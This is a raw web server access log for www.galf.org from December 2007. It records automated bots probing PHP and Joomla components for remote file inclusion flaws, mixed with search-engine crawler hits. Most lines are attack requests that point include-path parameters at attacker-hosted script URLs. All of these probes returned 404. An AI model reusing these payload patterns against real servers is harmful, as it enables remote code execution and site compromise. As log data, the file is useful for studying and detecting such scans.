64.34.193.87 - - [09/Dec/2007:16:48:38 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.34.193.87 - - [09/Dec/2007:16:48:38 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.157.182.9 - - [09/Dec/2007:16:49:45 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.157.182.9 - - [09/Dec/2007:16:49:46 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.146.199.232 - - [09/Dec/2007:16:49:55 -0800] "GET /logs/modules/mx_links/language/lang_english/lang_admin.php?mx_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.101.244.6 - - [09/Dec/2007:16:50:30 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://aspato-go.com/cartt/images/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.101.244.6 - - [09/Dec/2007:16:50:31 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://aspato-go.com/cartt/images/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.146.199.232 - - [09/Dec/2007:16:50:43 -0800] "GET /modules/mx_links/language/lang_english/lang_admin.php?mx_root_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.245.124.200 - - [09/Dec/2007:16:51:29 -0800] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.245.124.200 - - [09/Dec/2007:16:51:29 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.245.124.200 - - [09/Dec/2007:16:51:30 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.101.244.6 - - [09/Dec/2007:16:52:06 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aspato-go.com/cartt/images/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.101.244.9 - - [09/Dec/2007:16:52:07 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aspato-go.com/cartt/images/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:16:53:02 -0800] "GET /logs/access.log/default.php?page=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:16:53:02 -0800] "GET /default.php?page=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.22.162.60 - - [09/Dec/2007:16:53:02 -0800] "GET /logs/default.php?page=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.233.130.30 - - [09/Dec/2007:16:53:21 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.vincent-prado.com/blog/wp.rss.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
87.233.130.30 - - [09/Dec/2007:16:53:21 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.vincent-prado.com/blog/wp.rss.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
74.6.22.156 - - [09/Dec/2007:16:54:16 -0800] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.98.1.245 - - [09/Dec/2007:16:54:16 -0800] "GET /logs/access_071105.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.98.1.245 - - [09/Dec/2007:16:54:16 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.98.1.245 - - [09/Dec/2007:16:54:16 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.55.208.233 - - [09/Dec/2007:16:54:49 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.233 - - [09/Dec/2007:16:54:50 -0800] "GET /labia/?N=A HTTP/1.0" 200 508 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:56:57 -0800] "GET /logs/access_071105.log/default.php?page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
87.238.199.72 - - [09/Dec/2007:16:57:03 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:16:57:03 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.25.98 - - [09/Dec/2007:16:57:37 -0800] "GET /logs/access_071105.log/default.php?page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.54.45.2 - - [09/Dec/2007:16:59:33 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:16:59:45 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:16:59:45 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
88.131.106.16 - - [09/Dec/2007:17:00:20 -0800] "GET /cendoc/?D=A HTTP/1.0" 200 510 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:02:25 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:02:25 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:02:25 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.54.45.2 - - [09/Dec/2007:17:02:33 -0800] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.54.45.2 - - [09/Dec/2007:17:02:33 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:02:36 -0800] "GET /logs/access_070917.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.34.193.87 - - [09/Dec/2007:17:02:52 -0800] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.34.193.87 - - [09/Dec/2007:17:02:52 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.20.99 - - [09/Dec/2007:17:03:35 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://apxs.110mb.com/busca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.20.99 - - [09/Dec/2007:17:03:36 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://apxs.110mb.com/busca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:03:54 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.238.199.72 - - [09/Dec/2007:17:03:54 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:03:55 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:04:25 -0800] "GET /logs/access_071015.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.98.1.245 - - [09/Dec/2007:17:07:32 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:11:48 -0800] "GET /logs/access_070917.log/main.php?inc=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:11:48 -0800] "GET /main.php?inc=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:11:48 -0800] "GET /logs/main.php?inc=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
88.131.106.16 - - [09/Dec/2007:17:11:52 -0800] "GET /?N=D HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:11:54 -0800] "GET /logs/access_071014.log/main.php?inc=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.169.165.195 - - [09/Dec/2007:17:12:02 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.chicorulez.com.br//modules/Forums/admin/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
81.169.165.195 - - [09/Dec/2007:17:12:03 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.chicorulez.com.br//modules/Forums/admin/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
74.6.22.156 - - [09/Dec/2007:17:12:10 -0800] "GET /logs/access_070924.log HTTP/1.0" 200 983040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:12:16 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:12:19 -0800] "GET /logs/access_070826.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.238.199.72 - - [09/Dec/2007:17:12:19 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:12:19 -0800] "GET /logs/access_070827.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.165.195 - - [09/Dec/2007:17:13:33 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.chicorulez.com.br//modules/Forums/admin/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
81.169.165.195 - - [09/Dec/2007:17:13:33 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.chicorulez.com.br//modules/Forums/admin/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
67.18.107.66 - - [09/Dec/2007:17:13:52 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.chicorulez.com.br//modules/Forums/admin/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
67.18.107.66 - - [09/Dec/2007:17:13:54 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.chicorulez.com.br//modules/Forums/admin/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
64.41.145.56 - - [09/Dec/2007:17:14:19 -0800] "GET /logs/access_070716.log HTTP/1.1" 200 2587370 "-" "Python-urllib/2.5" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:16:17 -0800] "GET /logs/access_070917.log/main.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:16:18 -0800] "GET /main.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.232.208.170 - - [09/Dec/2007:17:16:18 -0800] "GET /logs/main.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [09/Dec/2007:17:16:42 -0800] "GET /default.php?page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:18:06 -0800] "GET /logs/access_070625.log/main.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:18:54 -0800] "GET /logs/access_070917.log/main.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:18:54 -0800] "GET /main.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.232.208.170 - - [09/Dec/2007:17:18:54 -0800] "GET /logs/main.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [09/Dec/2007:17:18:55 -0800] "GET /logs/access_071105.log/default.php?page=http://www.jukensei.com/arskobo/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:19:09 -0800] "GET /logs/access_071015.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.199.72 - - [09/Dec/2007:17:19:12 -0800] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:20:06 -0800] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:20:06 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:20:06 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:20:41 -0800] "GET /logs/access_070730.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:20:44 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:20:44 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:20:44 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:21:01 -0800] "GET /logs/access_070917.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
218.239.45.155 - - [09/Dec/2007:17:21:10 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/myachap/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.58.161.212 - - [09/Dec/2007:17:21:36 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.trinitymedia.co.za/cache/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
80.67.20.99 - - [09/Dec/2007:17:21:58 -0800] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://apxs.110mb.com/busca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
80.67.20.99 - - [09/Dec/2007:17:21:59 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://apxs.110mb.com/busca.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.232.208.170 - - [09/Dec/2007:17:22:39 -0800] "GET /logs/access_070917.log/main.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:22:40 -0800] "GET /main.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:22:40 -0800] "GET /logs/main.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [09/Dec/2007:17:22:53 -0800] "GET /logs/access.log/default.php?page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [09/Dec/2007:17:22:53 -0800] "GET /default.php?page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [09/Dec/2007:17:22:53 -0800] "GET /logs/default.php?page=http://yoga123.110mb.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.208.170 - - [09/Dec/2007:17:23:38 -0800] "GET /logs/access_070625.log/main.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
64.38.50.26 - - [09/Dec/2007:17:24:06 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [09/Dec/2007:17:24:06 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/xxx????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.58.161.212 - - [09/Dec/2007:17:24:57 -0800] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.trinitymedia.co.za/cache/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.161.212 - - [09/Dec/2007:17:24:57 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.trinitymedia.co.za/cache/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.119.158.50 - - [09/Dec/2007:17:25:00 -0800] "GET /logs/access_070827.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.lesovik.de/files/lol.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48"
